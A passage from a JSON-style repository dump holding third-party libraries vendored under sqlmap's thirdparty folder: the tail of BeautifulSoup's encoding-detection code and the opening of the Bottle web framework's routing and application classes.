xml_data[:4] == '\\x3c\\x00\\x00\\x00':\n                # UTF-32LE\n                sniffed_xml_encoding = 'utf-32le'\n                xml_data = text_type(xml_data, 'utf-32le').encode('utf-8')\n            elif xml_data[:4] == '\\x00\\x00\\xfe\\xff':\n                # UTF-32BE with BOM\n                sniffed_xml_encoding = 'utf-32be'\n                xml_data = text_type(xml_data[4:], 'utf-32be').encode('utf-8')\n            elif xml_data[:4] == '\\xff\\xfe\\x00\\x00':\n                # UTF-32LE with BOM\n                sniffed_xml_encoding = 'utf-32le'\n                xml_data = text_type(xml_data[4:], 'utf-32le').encode('utf-8')\n            elif xml_data[:3] == '\\xef\\xbb\\xbf':\n                # UTF-8 with BOM\n                sniffed_xml_encoding = 'utf-8'\n                xml_data = text_type(xml_data[3:], 'utf-8').encode('utf-8')\n            else:\n                sniffed_xml_encoding = 'ascii'\n                pass\n        except:\n            xml_encoding_match = None\n        xml_encoding_match = re.compile(\n            r'^<\\?.*encoding=[\\'\"](.*?)[\\'\"].*\\?>').match(xml_data)\n        if not xml_encoding_match and isHTML:\n            regexp = re.compile(r'<\\s*meta[^>]+charset=([^>]*?)[;\\'\">]', re.I)\n            xml_encoding_match = regexp.search(xml_data)\n        if xml_encoding_match is not None:\n            xml_encoding = xml_encoding_match.groups()[0].lower()\n            if isHTML:\n                self.declaredHTMLEncoding = xml_encoding\n            if sniffed_xml_encoding and \\\n               (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode',\n                                 'iso-10646-ucs-4', 'ucs-4', 'csucs4',\n                                 'utf-16', 'utf-32', 'utf_16', 'utf_32',\n                                 'utf16', 'u16')):\n                xml_encoding = sniffed_xml_encoding\n        return xml_data, xml_encoding, sniffed_xml_encoding\n\n\n    def find_codec(self, charset):\n        return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \\\n               or (charset and self._codec(charset.replace(\"-\", \"\"))) \\\n               or (charset and self._codec(charset.replace(\"-\", \"_\"))) \\\n               or charset\n\n    def _codec(self, charset):\n        if not charset: return charset\n        codec = None\n        try:\n            codecs.lookup(charset)\n            codec = charset\n        except (LookupError, ValueError):\n            pass\n        return codec\n\n    EBCDIC_TO_ASCII_MAP = None\n    def _ebcdic_to_ascii(self, s):\n        c = self.__class__\n        if not c.EBCDIC_TO_ASCII_MAP:\n            emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15,\n                    16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31,\n                    128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7,\n                    144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26,\n                    32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33,\n                    38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94,\n                    45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63,\n                    186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34,\n                    195,97,98,99,100,101,102,103,104,105,196,197,198,199,200,\n                    201,202,106,107,108,109,110,111,112,113,114,203,204,205,\n                    206,207,208,209,126,115,116,117,118,119,120,121,122,210,\n                    211,212,213,214,215,216,217,218,219,220,221,222,223,224,\n                    225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72,\n                    73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81,\n                    82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89,\n                    90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57,\n                    250,251,252,253,254,255)\n            import string\n            c.EBCDIC_TO_ASCII_MAP = string.maketrans( \\\n            ''.join(map(chr, xrange(256))), ''.join(map(chr, emap)))\n        return s.translate(c.EBCDIC_TO_ASCII_MAP)\n\n    MS_CHARS = { '\\x80' : ('euro', '20AC'),\n                 '\\x81' : ' ',\n                 '\\x82' : ('sbquo', '201A'),\n                 '\\x83' : ('fnof', '192'),\n                 '\\x84' : ('bdquo', '201E'),\n                 '\\x85' : ('hellip', '2026'),\n                 '\\x86' : ('dagger', '2020'),\n                 '\\x87' : ('Dagger', '2021'),\n                 '\\x88' : ('circ', '2C6'),\n                 '\\x89' : ('permil', '2030'),\n                 '\\x8A' : ('Scaron', '160'),\n                 '\\x8B' : ('lsaquo', '2039'),\n                 '\\x8C' : ('OElig', '152'),\n                 '\\x8D' : '?',\n                 '\\x8E' : ('#x17D', '17D'),\n                 '\\x8F' : '?',\n                 '\\x90' : '?',\n                 '\\x91' : ('lsquo', '2018'),\n                 '\\x92' : ('rsquo', '2019'),\n                 '\\x93' : ('ldquo', '201C'),\n                 '\\x94' : ('rdquo', '201D'),\n                 '\\x95' : ('bull', '2022'),\n                 '\\x96' : ('ndash', '2013'),\n                 '\\x97' : ('mdash', '2014'),\n                 '\\x98' : ('tilde', '2DC'),\n                 '\\x99' : ('trade', '2122'),\n                 '\\x9a' : ('scaron', '161'),\n                 '\\x9b' : ('rsaquo', '203A'),\n                 '\\x9c' : ('oelig', '153'),\n                 '\\x9d' : '?',\n                 '\\x9e' : ('#x17E', '17E'),\n                 '\\x9f' : ('Yuml', ''),}\n\n#######################################################################\n\n\n#By default, act as an HTML pretty-printer.\nif __name__ == '__main__':\n    soup = BeautifulSoup(sys.stdin)\n    print(soup.prettify())\n"
  },
  {
    "path": "sqlmap/thirdparty/bottle/__init__.py",
    "content": "pass\n"
  },
  {
    "path": "sqlmap/thirdparty/bottle/bottle.py",
    "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nBottle is a fast and simple micro-framework for small web applications. It\noffers request dispatching (Routes) with URL parameter support, templates,\na built-in HTTP Server and adapters for many third party WSGI/HTTP-server and\ntemplate engines - all in a single file and with no dependencies other than the\nPython Standard Library.\n\nHomepage and documentation: http://bottlepy.org/\n\nCopyright (c) 2009-2018, Marcel Hellkamp.\nLicense: MIT (see LICENSE for details)\n\"\"\"\n\nfrom __future__ import print_function\nimport sys\n\n__author__ = 'Marcel Hellkamp'\n__version__ = '0.13-dev'\n__license__ = 'MIT'\n\n###############################################################################\n# Command-line interface ######################################################\n###############################################################################\n# INFO: Some server adapters need to monkey-patch std-lib modules before they\n# are imported. This is why some of the command-line handling is done here, but\n# the actual call to _main() is at the end of the file.\n\n\ndef _cli_parse(args):  # pragma: no coverage\n    from argparse import ArgumentParser\n\n    parser = ArgumentParser(prog=args[0], usage=\"%(prog)s [options] package.module:app\")\n    opt = parser.add_argument\n    opt(\"--version\", action=\"store_true\", help=\"show version number.\")\n    opt(\"-b\", \"--bind\", metavar=\"ADDRESS\", help=\"bind socket to ADDRESS.\")\n    opt(\"-s\", \"--server\", default='wsgiref', help=\"use SERVER as backend.\")\n    opt(\"-p\", \"--plugin\", action=\"append\", help=\"install additional plugin/s.\")\n    opt(\"-c\", \"--conf\", action=\"append\", metavar=\"FILE\",\n        help=\"load config values from FILE.\")\n    opt(\"-C\", \"--param\", action=\"append\", metavar=\"NAME=VALUE\",\n        help=\"override config values.\")\n    opt(\"--debug\", action=\"store_true\", help=\"start server in debug mode.\")\n    opt(\"--reload\", action=\"store_true\", help=\"auto-reload on file changes.\")\n    opt('app', help='WSGI app entry point.', nargs='?')\n\n    cli_args = parser.parse_args(args[1:])\n\n    return cli_args, parser\n\n\ndef _cli_patch(cli_args):  # pragma: no coverage\n    parsed_args, _ = _cli_parse(cli_args)\n    opts = parsed_args\n    if opts.server:\n        if opts.server.startswith('gevent'):\n            import gevent.monkey\n            gevent.monkey.patch_all()\n        elif opts.server.startswith('eventlet'):\n            import eventlet\n            eventlet.monkey_patch()\n\n\nif __name__ == '__main__':\n    _cli_patch(sys.argv)\n\n###############################################################################\n# Imports and Python 2/3 unification ##########################################\n###############################################################################\n\nimport base64, calendar, cgi, email.utils, functools, hmac, imp, itertools,\\\n       mimetypes, os, re, tempfile, threading, time, warnings, weakref, hashlib\n\nfrom types import FunctionType\nfrom datetime import date as datedate, datetime, timedelta\nfrom tempfile import TemporaryFile\nfrom traceback import format_exc, print_exc\nfrom unicodedata import normalize\n\ntry:\n    from ujson import dumps as json_dumps, loads as json_lds\nexcept ImportError:\n    from json import dumps as json_dumps, loads as json_lds\n\n# inspect.getargspec was removed in Python 3.6, use\n# Signature-based version where we can (Python 3.3+)\ntry:\n    from inspect import signature\n    def getargspec(func):\n        params = signature(func).parameters\n        args, varargs, keywords, defaults = [], None, None, []\n        for name, param in params.items():\n            if param.kind == param.VAR_POSITIONAL:\n                varargs = name\n            elif param.kind == param.VAR_KEYWORD:\n                keywords = name\n            else:\n                args.append(name)\n                if param.default is not param.empty:\n                    defaults.append(param.default)\n        return (args, varargs, keywords, tuple(defaults) or None)\nexcept ImportError:\n    try:\n        from inspect import getfullargspec\n        def getargspec(func):\n            spec = getfullargspec(func)\n            kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)\n            return kwargs, spec[1], spec[2], spec[3]\n    except ImportError:\n        from inspect import getargspec\n\n\npy = sys.version_info\npy3k = py.major > 2\n\n# Lots of stdlib and builtin differences.\nif py3k:\n    import http.client as httplib\n    import _thread as thread\n    from urllib.parse import urljoin, SplitResult as UrlSplitResult\n    from urllib.parse import urlencode, quote as urlquote, unquote as urlunquote\n    urlunquote = functools.partial(urlunquote, encoding='latin1')\n    from http.cookies import SimpleCookie, Morsel, CookieError\n    from collections.abc import MutableMapping as DictMixin\n    import pickle\n    from io import BytesIO\n    import configparser\n\n    basestring = str\n    unicode = str\n    json_loads = lambda s: json_lds(touni(s))\n    callable = lambda x: hasattr(x, '__call__')\n    imap = map\n\n    def _raise(*a):\n        raise a[0](a[1]).with_traceback(a[2])\nelse:  # 2.x\n    import httplib\n    import thread\n    from urlparse import urljoin, SplitResult as UrlSplitResult\n    from urllib import urlencode, quote as urlquote, unquote as urlunquote\n    from Cookie import SimpleCookie, Morsel, CookieError\n    from itertools import imap\n    import cPickle as pickle\n    from StringIO import StringIO as BytesIO\n    import ConfigParser as configparser\n    from collections import MutableMapping as DictMixin\n    unicode = unicode\n    json_loads = json_lds\n    exec(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec'))\n\n# Some helpers for string/byte handling\ndef tob(s, enc='utf8'):\n    if isinstance(s, unicode):\n        return s.encode(enc)\n    return b'' if s is None else bytes(s)\n\n\ndef touni(s, enc='utf8', err='strict'):\n    if isinstance(s, bytes):\n        return s.decode(enc, err)\n    return unicode(\"\" if s is None else s)\n\n\ntonat = touni if py3k else tob\n\n\ndef _stderr(*args):\n    try:\n        print(*args, file=sys.stderr)\n    except (IOError, AttributeError):\n        pass # Some environments do not allow printing (mod_wsgi)\n\n\n# A bug in functools causes it to break if the wrapper is an instance method\ndef update_wrapper(wrapper, wrapped, *a, **ka):\n    try:\n        functools.update_wrapper(wrapper, wrapped, *a, **ka)\n    except AttributeError:\n        pass\n\n# These helpers are used at module level and need to be defined first.\n# And yes, I know PEP-8, but sometimes a lower-case classname makes more sense.\n\n\ndef depr(major, minor, cause, fix):\n    text = \"Warning: Use of deprecated feature or API. (Deprecated in Bottle-%d.%d)\\n\"\\\n           \"Cause: %s\\n\"\\\n           \"Fix: %s\\n\" % (major, minor, cause, fix)\n    if DEBUG == 'strict':\n        raise DeprecationWarning(text)\n    warnings.warn(text, DeprecationWarning, stacklevel=3)\n    return DeprecationWarning(text)\n\n\ndef makelist(data):  # This is just too handy\n    if isinstance(data, (tuple, list, set, dict)):\n        return list(data)\n    elif data:\n        return [data]\n    else:\n        return []\n\n\nclass DictProperty(object):\n    \"\"\" Property that maps to a key in a local dict-like attribute. \"\"\"\n\n    def __init__(self, attr, key=None, read_only=False):\n        self.attr, self.key, self.read_only = attr, key, read_only\n\n    def __call__(self, func):\n        functools.update_wrapper(self, func, updated=[])\n        self.getter, self.key = func, self.key or func.__name__\n        return self\n\n    def __get__(self, obj, cls):\n        if obj is None: return self\n        key, storage = self.key, getattr(obj, self.attr)\n        if key not in storage: storage[key] = self.getter(obj)\n        return storage[key]\n\n    def __set__(self, obj, value):\n        if self.read_only: raise AttributeError(\"Read-Only property.\")\n        getattr(obj, self.attr)[self.key] = value\n\n    def __delete__(self, obj):\n        if self.read_only: raise AttributeError(\"Read-Only property.\")\n        del getattr(obj, self.attr)[self.key]\n\n\nclass cached_property(object):\n    \"\"\" A property that is only computed once per instance and then replaces\n        itself with an ordinary attribute. Deleting the attribute resets the\n        property. \"\"\"\n\n    def __init__(self, func):\n        update_wrapper(self, func)\n        self.func = func\n\n    def __get__(self, obj, cls):\n        if obj is None: return self\n        value = obj.__dict__[self.func.__name__] = self.func(obj)\n        return value\n\n\nclass lazy_attribute(object):\n    \"\"\" A property that caches itself to the class object. \"\"\"\n\n    def __init__(self, func):\n        functools.update_wrapper(self, func, updated=[])\n        self.getter = func\n\n    def __get__(self, obj, cls):\n        value = self.getter(cls)\n        setattr(cls, self.__name__, value)\n        return value\n\n###############################################################################\n# Exceptions and Events #######################################################\n###############################################################################\n\n\nclass BottleException(Exception):\n    \"\"\" A base class for exceptions used by bottle. \"\"\"\n    pass\n\n###############################################################################\n# Routing ######################################################################\n###############################################################################\n\n\nclass RouteError(BottleException):\n    \"\"\" This is a base class for all routing related exceptions \"\"\"\n\n\nclass RouteReset(BottleException):\n    \"\"\" If raised by a plugin or request handler, the route is reset and all\n        plugins are re-applied. \"\"\"\n\n\nclass RouterUnknownModeError(RouteError):\n\n    pass\n\n\nclass RouteSyntaxError(RouteError):\n    \"\"\" The route parser found something not supported by this router. \"\"\"\n\n\nclass RouteBuildError(RouteError):\n    \"\"\" The route could not be built. \"\"\"\n\n\ndef _re_flatten(p):\n    \"\"\" Turn all capturing groups in a regular expression pattern into\n        non-capturing groups. \"\"\"\n    if '(' not in p:\n        return p\n    return re.sub(r'(\\\\*)(\\(\\?P<[^>]+>|\\((?!\\?))', lambda m: m.group(0) if\n                  len(m.group(1)) % 2 else m.group(1) + '(?:', p)\n\n\nclass Router(object):\n    \"\"\" A Router is an ordered collection of route->target pairs. It is used to\n        efficiently match WSGI requests against a number of routes and return\n        the first target that satisfies the request. The target may be anything,\n        usually a string, ID or callable object. A route consists of a path-rule\n        and a HTTP method.\n\n        The path-rule is either a static path (e.g. `/contact`) or a dynamic\n        path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax\n        and details on the matching order are described in docs:`routing`.\n    \"\"\"\n\n    default_pattern = '[^/]+'\n    default_filter = 're'\n\n    #: The current CPython regexp implementation does not allow more\n    #: than 99 matching groups per regular expression.\n    _MAX_GROUPS_PER_PATTERN = 99\n\n    def __init__(self, strict=False):\n        self.rules = []  # All rules in order\n        self._groups = {}  # index of regexes to find them in dyna_routes\n        self.builder = {}  # Data structure for the url builder\n        self.static = {}  # Search structure for static routes\n        self.dyna_routes = {}\n        self.dyna_regexes = {}  # Search structure for dynamic routes\n        #: If true, static routes are no longer checked first.\n        self.strict_order = strict\n        self.filters = {\n            're': lambda conf: (_re_flatten(conf or self.default_pattern),\n                                None, None),\n            'int': lambda conf: (r'-?\\d+', int, lambda x: str(int(x))),\n            'float': lambda conf: (r'-?[\\d.]+', float, lambda x: str(float(x))),\n            'path': lambda conf: (r'.+?', None, None)\n        }\n\n    def add_filter(self, name, func):\n        \"\"\" Add a filter. The provided function is called with the configuration\n        string as parameter and must return a (regexp, to_python, to_url) tuple.\n        The first element is a string, the last two are callables or None. \"\"\"\n        self.filters[name] = func\n\n    rule_syntax = re.compile('(\\\\\\\\*)'\n        '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'\n          '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'\n            '(?::((?:\\\\\\\\.|[^\\\\\\\\>])+)?)?)?>))')\n\n    def _itertokens(self, rule):\n        offset, prefix = 0, ''\n        for match in self.rule_syntax.finditer(rule):\n            prefix += rule[offset:match.start()]\n            g = match.groups()\n            if g[2] is not None:\n                depr(0, 13, \"Use of old route syntax.\",\n                            \"Use <name> instead of :name in routes.\")\n            if len(g[0]) % 2:  # Escaped wildcard\n                prefix += match.group(0)[len(g[0]):]\n                offset = match.end()\n                continue\n            if prefix:\n                yield prefix, None, None\n            name, filtr, conf = g[4:7] if g[2] is None else g[1:4]\n            yield name, filtr or 'default', conf or None\n            offset, prefix = match.end(), ''\n        if offset <= len(rule) or prefix:\n            yield prefix + rule[offset:], None, None\n\n    def add(self, rule, method, target, name=None):\n        \"\"\" Add a new rule or replace the target for an existing rule. \"\"\"\n        anons = 0  # Number of anonymous wildcards found\n        keys = []  # Names of keys\n        pattern = ''  # Regular expression pattern with named groups\n        filters = []  # Lists of wildcard input filters\n        builder = []  # Data structure for the URL builder\n        is_static = True\n\n        for key, mode, conf in self._itertokens(rule):\n            if mode:\n                is_static = False\n                if mode == 'default': mode = self.default_filter\n                mask, in_filter, out_filter = self.filters[mode](conf)\n                if not key:\n                    pattern += '(?:%s)' % mask\n                    key = 'anon%d' % anons\n                    anons += 1\n                else:\n                    pattern += '(?P<%s>%s)' % (key, mask)\n                    keys.append(key)\n                if in_filter: filters.append((key, in_filter))\n                builder.append((key, out_filter or str))\n            elif key:\n                pattern += re.escape(key)\n                builder.append((None, key))\n\n        self.builder[rule] = builder\n        if name: self.builder[name] = builder\n\n        if is_static and not self.strict_order:\n            self.static.setdefault(method, {})\n            self.static[method][self.build(rule)] = (target, None)\n            return\n\n        try:\n            re_pattern = re.compile('^(%s)$' % pattern)\n            re_match = re_pattern.match\n        except re.error as e:\n            raise RouteSyntaxError(\"Could not add Route: %s (%s)\" % (rule, e))\n\n        if filters:\n\n            def getargs(path):\n                url_args = re_match(path).groupdict()\n                for name, wildcard_filter in filters:\n                    try:\n                        url_args[name] = wildcard_filter(url_args[name])\n                    except ValueError:\n                        raise HTTPError(400, 'Path has wrong format.')\n                return url_args\n        elif re_pattern.groupindex:\n\n            def getargs(path):\n                return re_match(path).groupdict()\n        else:\n            getargs = None\n\n        flatpat = _re_flatten(pattern)\n        whole_rule = (rule, flatpat, target, getargs)\n\n        if (flatpat, method) in self._groups:\n            if DEBUG:\n                msg = 'Route <%s %s> overwrites a previously defined route'\n                warnings.warn(msg % (method, rule), RuntimeWarning)\n            self.dyna_routes[method][\n                self._groups[flatpat, method]] = whole_rule\n        else:\n            self.dyna_routes.setdefault(method, []).append(whole_rule)\n            self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1\n\n        self._compile(method)\n\n    def _compile(self, method):\n        all_rules = self.dyna_routes[method]\n        comborules = self.dyna_regexes[method] = []\n        maxgroups = self._MAX_GROUPS_PER_PATTERN\n        for x in range(0, len(all_rules), maxgroups):\n            some = all_rules[x:x + maxgroups]\n            combined = (flatpat for (_, flatpat, _, _) in some)\n            combined = '|'.join('(^%s$)' % flatpat for flatpat in combined)\n            combined = re.compile(combined).match\n            rules = [(target, getargs) for (_, _, target, getargs) in some]\n            comborules.append((combined, rules))\n\n    def build(self, _name, *anons, **query):\n        \"\"\" Build an URL by filling the wildcards in a rule. \"\"\"\n        builder = self.builder.get(_name)\n        if not builder:\n            raise RouteBuildError(\"No route with that name.\", _name)\n        try:\n            for i, value in enumerate(anons):\n                query['anon%d' % i] = value\n            url = ''.join([f(query.pop(n)) if n else f for (n, f) in builder])\n            return url if not query else url + '?' + urlencode(query)\n        except KeyError as E:\n            raise RouteBuildError('Missing URL argument: %r' % E.args[0])\n\n    def match(self, environ):\n        \"\"\" Return a (target, url_args) tuple or raise HTTPError(400/404/405). \"\"\"\n        verb = environ['REQUEST_METHOD'].upper()\n        path = environ['PATH_INFO'] or '/'\n\n        methods = ('PROXY', 'HEAD', 'GET', 'ANY') if verb == 'HEAD' else ('PROXY', verb, 'ANY')\n\n        for method in methods:\n            if method in self.static and path in self.static[method]:\n                target, getargs = self.static[method][path]\n                return target, getargs(path) if getargs else {}\n            elif method in self.dyna_regexes:\n                for combined, rules in self.dyna_regexes[method]:\n                    match = combined(path)\n                    if match:\n                        target, getargs = rules[match.lastindex - 1]\n                        return target, getargs(path) if getargs else {}\n\n        # No matching route found. Collect alternative methods for 405 response\n        allowed = set([])\n        nocheck = set(methods)\n        for method in set(self.static) - nocheck:\n            if path in self.static[method]:\n                allowed.add(method)\n        for method in set(self.dyna_regexes) - allowed - nocheck:\n            for combined, rules in self.dyna_regexes[method]:\n                match = combined(path)\n                if match:\n                    allowed.add(method)\n        if allowed:\n            allow_header = \",\".join(sorted(allowed))\n            raise HTTPError(405, \"Method not allowed.\", Allow=allow_header)\n\n        # No matching route and no alternative method found. We give up\n        raise HTTPError(404, \"Not found: \" + repr(path))\n\n\nclass Route(object):\n    \"\"\" This class wraps a route callback along with route specific metadata and\n        configuration and applies Plugins on demand. It is also responsible for\n        turning an URL path rule into a regular expression usable by the Router.\n    \"\"\"\n\n    def __init__(self, app, rule, method, callback,\n                 name=None,\n                 plugins=None,\n                 skiplist=None, **config):\n        #: The application this route is installed to.\n        self.app = app\n        #: The path-rule string (e.g. ``/wiki/<page>``).\n        self.rule = rule\n        #: The HTTP method as a string (e.g. ``GET``).\n        self.method = method\n        #: The original callback with no plugins applied. Useful for introspection.\n        self.callback = callback\n        #: The name of the route (if specified) or ``None``.\n        self.name = name or None\n        #: A list of route-specific plugins (see :meth:`Bottle.route`).\n        self.plugins = plugins or []\n        #: A list of plugins to not apply to this route (see :meth:`Bottle.route`).\n        self.skiplist = skiplist or []\n        #: Additional keyword arguments passed to the :meth:`Bottle.route`\n        #: decorator are stored in this dictionary. Used for route-specific\n        #: plugin configuration and meta-data.\n        self.config = app.config._make_overlay()\n        self.config.load_dict(config)\n\n    @cached_property\n    def call(self):\n        \"\"\" The route callback with all plugins applied. This property is\n            created on demand and then cached to speed up subsequent requests.\"\"\"\n        return self._make_callback()\n\n    def reset(self):\n        \"\"\" Forget any cached values. The next time :attr:`call` is accessed,\n            all plugins are re-applied. \"\"\"\n        self.__dict__.pop('call', None)\n\n    def prepare(self):\n        \"\"\" Do all on-demand work immediately (useful for debugging).\"\"\"\n        self.call\n\n    def all_plugins(self):\n        \"\"\" Yield all Plugins affecting this route. \"\"\"\n        unique = set()\n        for p in reversed(self.app.plugins + self.plugins):\n            if True in self.skiplist: break\n            name = getattr(p, 'name', False)\n            if name and (name in self.skiplist or name in unique): continue\n            if p in self.skiplist or type(p) in self.skiplist: continue\n            if name: unique.add(name)\n            yield p\n\n    def _make_callback(self):\n        callback = self.callback\n        for plugin in self.all_plugins():\n            try:\n                if hasattr(plugin, 'apply'):\n                    callback = plugin.apply(callback, self)\n                else:\n                    callback = plugin(callback)\n            except RouteReset:  # Try again with changed configuration.\n                return self._make_callback()\n            if callback is not self.callback:\n                update_wrapper(callback, self.callback)\n        return callback\n\n    def get_undecorated_callback(self):\n        \"\"\" Return the callback. If the callback is a decorated function, try to\n            recover the original function. \"\"\"\n        func = self.callback\n        func = getattr(func, '__func__' if py3k else 'im_func', func)\n        closure_attr = '__closure__' if py3k else 'func_closure'\n        while hasattr(func, closure_attr) and getattr(func, closure_attr):\n            attributes = getattr(func, closure_attr)\n            func = attributes[0].cell_contents\n\n            # in case of decorators with multiple arguments\n            if not isinstance(func, FunctionType):\n                # pick first FunctionType instance from multiple arguments\n                func = filter(lambda x: isinstance(x, FunctionType),\n                              map(lambda x: x.cell_contents, attributes))\n                func = list(func)[0]  # py3 support\n        return func\n\n    def get_callback_args(self):\n        \"\"\" Return a list of argument names the callback (most likely) accepts\n            as keyword arguments. If the callback is a decorated function, try\n            to recover the original function before inspection. \"\"\"\n        return getargspec(self.get_undecorated_callback())[0]\n\n    def get_config(self, key, default=None):\n        \"\"\" Lookup a config field and return its value, first checking the\n            route.config, then route.app.config.\"\"\"\n        depr(0, 13, \"Route.get_config() is deprecated.\",\n                    \"The Route.config property already includes values from the\"\n                    \" application config for missing keys. Access it directly.\")\n        return self.config.get(key, default)\n\n    def __repr__(self):\n        cb = self.get_undecorated_callback()\n        return '<%s %s -> %s:%s>' % (self.method, self.rule, cb.__module__, cb.__name__)\n\n###############################################################################\n# Application Object ###########################################################\n###############################################################################\n\n\nclass Bottle(object):\n    \"\"\" Each Bottle object represents a single, distinct web application and\n        consists of routes, callbacks, plugins, resources and configuration.\n        Instances are callable WSGI applications.\n\n        :param catchall: If true (default), handle all exceptions. Turn off to\n                         let debugging middleware handle exceptions.\n    \"\"\"\n\n    @lazy_attribute\n    def _global_config(cls):\n        cfg = ConfigDict()\n        cfg.meta_set('catchall', 'validate', bool)\n        return cfg\n\n    def __init__(self, **kwargs):\n        #: A :class:`ConfigDict` for app specific configuration.\n        self.config = self._global_config._make_overlay()\n        self.config._add_change_listener(\n            functools.partial(self.trigger_hook, 'config'))\n\n        self.config.update({\n            \"catchall\": True\n        })\n\n        if kwargs.get('catchall') is False:\n            depr(0, 13, \"Bottle(catchall) keyword argument.\",\n                        \"The 'catchall' setting is now part of the app \"\n                        \"configuration. Fix: `app.config['catchall'] = False`\")\n            self.config['catchall'] = False\n        if kwargs.get('autojson') is False:\n            depr(0, 13, \"Bottle(autojson) keyword argument.\",\n                 \"The 'autojson' setting is now part of the app \"\n                 \"configuration. Fix: `app.config['json.enable'] = False`\")\n            self.config['json.disable'] = True\n\n        self._mounts = []\n\n        #: A :class:`ResourceManager` for application files\n        self.resources = ResourceManager()\n\n        self.routes = []  # List of installed :class:`Route` instances.\n        self.router = Router()  # Maps requests to :class:`Route` instances.\n        self.error_handler = {}\n\n        # Core plugins\n        self.plugins = []  # List of installed plugins.\n        self.install(JSONPlugin())\n        self.install(TemplatePlugin())\n\n    #: If true, most exceptions are caught and returned as :exc:`HTTPError`\n    catchall = DictProperty('config', 'catchall')\n\n    __hook_names = 'before_request', 'after_request', 'app_reset', 'config'\n    __hook_reversed = {'after_request'}\n\n    @cached_property\n    def _hooks(self):\n        return dict((name, []) for name in self.__hook_names)\n\n    def add_hook(self, name, func):\n        \"\"\" Attach a callback to a hook. Three hooks are currently implemented:\n\n            before_request\n                Executed once before each request. The request context is\n                available, but no routing has happened yet.\n            after_request\n                Executed once after each request regardless of its outcome.\n            app_reset\n                Called whenever :meth:`Bottle.reset` is called.\n        \"\"\"\n        if name in self.__hook_reversed:\n            self._hooks[name].insert(0, func)\n        else:\n            self._hooks[name].append(func)\n\n    def remove_hook(self, name, func):\n        \"\"\" Remove a callback from a hook. \"\"\"\n        if name in self._hooks and func in self._hooks[name]:\n            self._hooks[name].remove(func)\n            return True\n\n    def trigger_hook(self, __name, *args, **kwargs):\n        \"\"\" Trigger a hook and return a list of results. \"\"\"\n        return [hook(*args, **kwargs) for hook in self._hooks[__name][:]]\n\n    def hook(self, name):\n        \"\"\" Return a decorator that attaches a callback to a hook. See\n            :meth:`add_hook` for details.\"\"\"\n\n        def decorator(func):\n            self.add_hook(name, func)\n            return func\n\n        return decorator\n\n    def _mount_wsgi(self, prefix, app, **options):\n        segments = [p for p in prefix.split('/') if p]\n        if not segments:\n            raise ValueError('WSGI applications cannot be mounted to \"/\".')\n        path_depth = len(segments)\n\n        def mountpoint_wrapper():\n            try:\n                request.path_shift(path_depth)\n                rs = HTTPResponse([])\n\n                def start_response(status, headerlist, exc_info=None):\n                    if exc_info:\n                        _raise(*exc_info)\n                    if py3k:\n                        # Errors here mean that the mounted WSGI app did not\n                        # follow PEP-3333 (which requires latin1) or used a\n                        # pre-encoding other than utf8 :/\n                        status = status.encode('latin1').decode('utf8')\n                        headerlist = [(k, v.encode('latin1').decode('utf8'))\n                                      for (k, v) in headerlist]\n                    rs.status = status\n                    for name, value in headerlist:\n                        rs.add_header(name, value)\n                    return rs.body.append\n\n                body = app(request.environ, start_response)\n                rs.body = itertools.chain(rs.body, body) if rs.body else body\n                return rs\n            finally:\n                request.path_shift(-path_depth)\n\n        options.setdefault('skip', True)\n        options.setdefault('method', 'PROXY')\n        options.setdefault('mountpoint', {'prefix': prefix, 'target': app})\n        options['callback'] = mountpoint_wrapper\n\n        self.route('/%s/<:re:.*>' % '/'.join(segments), **options)\n        if not prefix.endswith('/'):\n            self.route('/' + '/'.join(segments), **options)\n\n    def _mount_app(self, prefix, app, **options):\n        if app in self._mounts or '_mount.app' in app.config:\n            depr(0, 13, \"Application mounted multiple times. Falling back to WSGI mount.\",\n                 \"Clone application before mounting to a different location.\")\n            return self._mount_wsgi(prefix, app, **options)\n\n        if options:\n            depr(0, 13, \"Unsupported mount options. Falling back to WSGI mount.\",\n                 \"Do not specify any route options when mounting bottle application.\")\n            return self._mount_wsgi(prefix, app, **options)\n\n        if not prefix.endswith(\"/\"):\n            depr(0, 13, \"Prefix must end in '/'. Falling back to WSGI mount.\",\n                 \"Consider adding an explicit redirect from '/prefix' to '/prefix/' in the parent application.\")\n            return self._mount_wsgi(prefix, app, **options)\n\n        self._mounts.append(app)\n        app.config['_mount.prefix'] = prefix\n        app.config['_mount.app'] = self\n        for route in app.routes:\n            route.rule = prefix + route.rule.lstrip('/')\n            self.add_route(route)\n\n    def mount(self, prefix, app, **options):\n        \"\"\" Mount an application (:class:`Bottle` or plain WSGI) to a specific\n            URL prefix. Example::\n\n                parent_app.mount('/prefix/', child_app)\n\n            :param prefix: path prefix or `mount-point`.\n            :param app: an instance of :class:`Bottle` or a WSGI application.\n\n            Plugins from the parent application are not applied to the routes\n            of the mounted child application. If you need plugins in the child\n            application, install them separately.\n\n            While it is possible to use path wildcards within the prefix path\n            (:class:`Bottle` childs only), it is highly discouraged.\n\n            The prefix path must end with a slash. If you want to access the\n            root of the child application via `/prefix` in addition to\n            `/prefix/`, consider adding a route with a 307 redirect to the\n            parent application.\n        \"\"\"\n\n        if not prefix.startswith('/'):\n            raise ValueError(\"Prefix must start with '/'\")\n\n        if isinstance(app, Bottle):\n            return self._mount_app(prefix, app, **options)\n        else:\n            return self._mount_wsgi(prefix, app, **options)\n\n    def merge(self, routes):\n        \"\"\" Merge the 